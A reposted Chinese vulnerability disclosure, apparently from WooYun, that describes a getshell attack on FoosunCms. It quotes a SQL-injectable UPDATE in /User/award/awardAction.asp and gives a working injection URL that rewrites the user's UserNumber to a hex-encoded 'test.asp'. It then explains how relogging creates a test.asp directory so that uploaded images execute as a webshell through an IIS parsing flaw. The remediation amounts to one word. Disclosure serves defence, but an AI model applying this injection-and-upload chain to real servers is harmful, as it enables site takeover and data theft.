转载

FoosunCms getshell

漏洞标题 FoosunCms getshell
相关厂商 FoosunCms
漏洞作者 Code_Sec
提交时间 2013-09-27 08:38
公开时间 2013-12-26 08:38
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 10
漏洞状态 未联系到厂商或者厂商积极忽略
Tags标签

漏洞详情

在文件/User/award/awardAction.asp中:

code 区域

Integral=NoSqlHack(request.QueryString("Integral"))
if action="join" then
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
'获得当前参加人数--------------------------------
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")

请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

FoosunCms getshell

webshell还可以用来代替access

我们文件管理中上传个图片文件:

http://192.168.1.101/UserFiles/27015564I69/2013_09_27_01_10_0390446.jpg

UserNumber就是等于27015564I69

通过以上的sql注入漏洞,直接update为test.asp

http://192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1

FoosunCms getshell

退出再重新登录

FoosunCms getshell

生成test.asp目录,后续上传的文件都会保存在该文件中

利用iis解析漏洞获取webshell

漏洞证明:

FoosunCms getshell

修复方案:

过滤

版权声明:转载请注明来源 Code_Sec @ 乌云

正文到此结束
Loading...